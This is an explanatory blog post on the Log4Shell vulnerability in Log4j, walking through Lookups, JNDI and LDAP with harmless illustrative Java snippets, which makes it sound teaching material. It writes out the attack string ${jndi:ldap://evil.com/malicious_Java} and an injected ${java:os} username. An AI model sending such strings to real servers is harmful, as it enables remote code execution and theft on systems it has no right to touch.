Log4Shell: Simple Technical Explanation of the Exploit

Dec 17, 2021

Last week’s Log4Shell vulnerability is a dramatic example of how modern applications, interconnected services and pervasive APIs can create substantial security challenges. As a security researcher who has spent years looking at API vulnerabilities, I see it as an excellent example of how things can go wrong. I recently took part in a webinar explaining the details of this exploit, and this post shares my understanding of this emerging threat.

Background

Logs are a mechanism for developers to record events that occur in their applications. Effectively, they are a simple way for developers to save messages into one file so they can review the messages, troubleshoot and debug problems. Generally, there are two types of log messages. The first is hard-coded. For example, imagine that the CPU usage of your app suddenly increases by 10%. The log message for this event is fixed and says, “The CPU increased 10%.” There is no input from the user.

The second type of log message contains some form of user input. For example, a user logs into Facebook; the Facebook API logs the activity and writes into the log a message, “User <Hugo> logged in at 7:00 PM”. (Side note: In case you’re curious, Hugo is my stage name. So, if you see Hugo in your logs, there’s a good chance I was trying to exploit your system.☺)
The critical thing is that the username, a value the user controls, was written to the log. This matters from a security perspective, and it is exactly what the Log4j vulnerability exploits: user input gets into the log, which opens the door for attackers.
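
To make the two types concrete, here is a minimal sketch in plain Java. `LogMessages` and its methods are names I made up for illustration; they don't come from any logging library.

```java
final class LogMessages {
    // Type 1: fixed text, no user input involved.
    static String cpuAlert() {
        return "The CPU increased 10%.";
    }

    // Type 2: the username comes from the request, so the user
    // controls part of what ends up in the log.
    static String loginEvent(String username, String time) {
        return "User <" + username + "> logged in at " + time;
    }

    public static void main(String[] args) {
        System.out.println(cpuAlert());
        System.out.println(loginEvent("Hugo", "7:00 PM"));
    }
}
```

Whatever string arrives as `username` is copied into the log message as-is, and that is the part an attacker gets to choose.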

Why Logs are Vulnerable

There are many ways to implement a logging mechanism. You can just put all the messages into one file and then read it manually. It’s a simple option, but it doesn’t really scale with complex systems. Developers usually adopt logging frameworks because they make the job easier. In every language, you can find different frameworks to manage your logs.

One of the most widely used and feature-rich logging frameworks is Log4j for Java, an Apache Software Foundation project. Log4j makes developers more efficient when they write logs. Logging frameworks often offer complex parsing of log records, which is where a log entry that includes user input might become a problem. What if user input gets processed by the logging framework as a command? That could be bad. And that’s exactly what we see in the Log4Shell exploit.

Log4Shell

The vulnerability was reported by a researcher from the Alibaba Cloud team on November 24, 2021, and publicly disclosed by Apache on December 9, 2021. It’s a massive issue because the vulnerability impacts hundreds of millions (potentially even billions) of devices. At this point, the blast radius of the exposure is not 100% clear.

This vulnerability is not obvious. Three components combine to let an attacker run remote code on a server running Log4j with a single HTTP call. Stay with me; let’s explore the components that led to this very critical vulnerability.

Log4j Lookups

Log4j offers developers many features to make their lives easier and save time. One of these features is called Lookups. It’s a fancy feature that allows developers to insert variables into their logs. Some parts of the log are constant while some are dynamic. For example, if a developer wants to write the current time into a log message, its dynamic value depends on when the code is running. Developers use Lookups to put variables, such as current time, into their logs. You can think about Lookups as a template language for Log4j.

For example, a developer might write an error message into the log: “A problem occurred”, followed by the ID of the current Docker container where Log4j runs. As part of parsing the log message, Log4j converts the input ${docker:containerId} into the container’s ID, which is written to the log. In this scenario, Lookups are very cool: they save developers time when coding and deliver consistent log entries.
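
Here is a toy model of that substitution step in plain Java. This is not Log4j’s implementation, just a sketch of the idea: `ToyLookups`, its resolver map, and the container ID `3f4e8a1c9b2d` are all made up for the demo.

```java
import java.util.Map;
import java.util.function.Function;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

final class ToyLookups {
    // Matches ${prefix:key}, e.g. ${docker:containerId}.
    private static final Pattern LOOKUP =
            Pattern.compile("\\$\\{([^:}]+):([^}]*)\\}");

    private final Map<String, Function<String, String>> resolvers;

    ToyLookups(Map<String, Function<String, String>> resolvers) {
        this.resolvers = resolvers;
    }

    // Replace every known ${prefix:key} with the resolver's value;
    // lookups with an unknown prefix are left untouched.
    String resolve(String message) {
        Matcher m = LOOKUP.matcher(message);
        return m.replaceAll(r -> {
            Function<String, String> f = resolvers.get(r.group(1));
            String value = (f == null) ? r.group() : f.apply(r.group(2));
            return Matcher.quoteReplacement(value);
        });
    }

    public static void main(String[] args) {
        // Hypothetical container ID, hard-coded for the demo.
        Map<String, Function<String, String>> resolvers =
                Map.of("docker", key -> "3f4e8a1c9b2d");
        ToyLookups lookups = new ToyLookups(resolvers);
        System.out.println(
                lookups.resolve("A problem occurred in container ${docker:containerId}"));
    }
}
```

The developer writes the template once, and the framework fills in the dynamic part every time the line is logged.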

Lookups by themselves are not a problem. The problem is when a user has the opportunity to inject a Lookup into the log. Here’s how an end-user could use Lookups to write a strange entry into the log. The user tries to log into the website using a weird username ${java:os}, which is actually a Lookup on Log4j.

Because the username doesn’t exist, the API logs this activity as “Login failed at 8:00 pm” along with the username. While parsing the message, the Log4j library treats the username as a Lookup: it evaluates “java:os”, takes the returned string (for example, “Windows Server 2008”) and stores that in the log instead of the text the user typed.

Turning a username into the server’s OS name isn’t destructive by itself, but it exposes the real problem: an attacker can reach internal Java functionality that was never meant to be exposed to users.
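
The same thing can be sketched in a few lines of plain Java. Again, this is a toy stand-in and not Log4j’s code: `InjectedLookupDemo`, `render` and `loginFailed` are hypothetical names, and the sketch only understands the single Lookup `${java:os}`, which it answers with the JVM’s `os.name` property.

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

final class InjectedLookupDemo {
    private static final Pattern JAVA_OS = Pattern.compile("\\$\\{java:os\\}");

    // Toy stand-in for the logger: expands ${java:os} wherever it appears,
    // including inside text that came from the user.
    static String render(String message) {
        String os = System.getProperty("os.name");
        return JAVA_OS.matcher(message).replaceAll(Matcher.quoteReplacement(os));
    }

    // The application simply concatenates the submitted username.
    static String loginFailed(String username, String time) {
        return "Login failed at " + time + " for user " + username;
    }

    public static void main(String[] args) {
        String attackerInput = "${java:os}";
        // The rendered line contains the server's OS name,
        // not the literal text the attacker typed.
        System.out.println(render(loginFailed(attackerInput, "8:00 pm")));
    }
}
```

The application code never asked for the OS name. The attacker did, simply by choosing a username that the logger interprets instead of recording.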

JNDI and Lookups

The Lookups mechanism supports various functions and protocols. One of the most interesting (and dangerous) is the Java Naming and Directory Interface (JNDI). This API lets Java code, including the Log4j framework, look up a Java object by name and load it.

Rather than sending in a username, an attacker could just send a file name. The Log4j library would then try to use JNDI to find this file in your local environment and run it. Not good. As a user, you’re not supposed to be able to run Java files on the server. At the same time, it’s not catastrophic, because the attacker can only reach a local file that already exists on the server.

Local Vs. LDAP

Here’s where it gets scary. JNDI supports different protocols to retrieve the Java file.

One of them is LDAP, which is where this scenario goes from bad to really, really bad. LDAP allows you to retrieve files from a remote location. The Log4j library will load the Java file from a remote LDAP server when using LDAP with JNDI.
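
To make the local-versus-remote difference concrete, here is a minimal sketch in plain Java. It is not Log4j’s code. `JndiSketch`, `isLdapUrl` and the name `java:comp/env/jdbc/appDb` are made up for illustration; `InitialContext.lookup` is the standard JNDI entry point in the JDK. The `lookup` method is there only to show the shape of the call and is never invoked in `main`, because calling it with an attacker-controlled name is exactly the dangerous step.

```java
import java.util.Locale;
import javax.naming.InitialContext;
import javax.naming.NamingException;

final class JndiSketch {
    // Resolve a name through JNDI. With a URL-style name such as
    // "ldap://host/path", the JDK's LDAP provider contacts that host.
    // Never call this with untrusted input.
    static Object lookup(String name) throws NamingException {
        return new InitialContext().lookup(name);
    }

    // Hypothetical helper: does the name point at an LDAP server by URL?
    static boolean isLdapUrl(String name) {
        String lower = name.toLowerCase(Locale.ROOT);
        return lower.startsWith("ldap://") || lower.startsWith("ldaps://");
    }

    public static void main(String[] args) {
        // A local-style name, resolved inside the server's own environment.
        System.out.println(isLdapUrl("java:comp/env/jdbc/appDb"));
        // A URL-style name, which sends the lookup to another machine.
        System.out.println(isLdapUrl("ldap://evil.com/malicious_Java"));
    }
}
```

The call is identical in both cases. Only the name changes, and whoever controls the name decides which server answers.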

The combination of user input, JNDI lookups and LDAP creates a love triangle.

This love triangle has spawned a hideous child: The Log4Shell payload we have all seen in the last week.

Log4Shell Payload — Attack Flow

Attackers usually send a payload of the form ${jndi:ldap://evil.com/malicious_Java}. The dollar sign and braces “${xxxxx}” trigger a Lookup. Inside this Lookup, the attacker calls the JNDI-with-LDAP combination to load a remote Java file from evil.com.

The evil.com server stores a file called “malicious_Java.” If the victim’s server is vulnerable, it downloads and runs the remote Java object from evil.com.

This allows the attacker to execute any Java code on the victim server.
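
The anatomy of such a payload can be pulled apart with a short, harmless sketch. It only parses the string and never contacts any server. `PayloadAnatomy` and `extractJndiUrl` are hypothetical names, and the payload string is the illustrative evil.com example, not a captured attack.

```java
import java.net.URI;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

final class PayloadAnatomy {
    // ${jndi:<url>}: the Lookup wrapper around a JNDI URL.
    private static final Pattern JNDI_LOOKUP =
            Pattern.compile("\\$\\{jndi:([^}]+)\\}");

    // Returns the URL inside a ${jndi:...} Lookup, or null if there is none.
    static URI extractJndiUrl(String input) {
        Matcher m = JNDI_LOOKUP.matcher(input);
        return m.find() ? URI.create(m.group(1)) : null;
    }

    public static void main(String[] args) {
        URI url = extractJndiUrl("${jndi:ldap://evil.com/malicious_Java}");
        System.out.println("protocol: " + url.getScheme()); // which JNDI provider is used
        System.out.println("server:   " + url.getHost());   // who the victim will contact
        System.out.println("object:   " + url.getPath());   // what the victim will ask for
    }
}
```

Each piece maps to one side of the triangle: the `${...}` wrapper is the Lookup, `jndi` selects JNDI, and the `ldap://` URL points the victim at the attacker’s server.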

TLDR: It’s game over.

Now the attacker has full access to your system and can do whatever they want, from simply shutting down the system to opening a remote shell, extracting all the information on your server, and/or starting to mine cryptocurrency.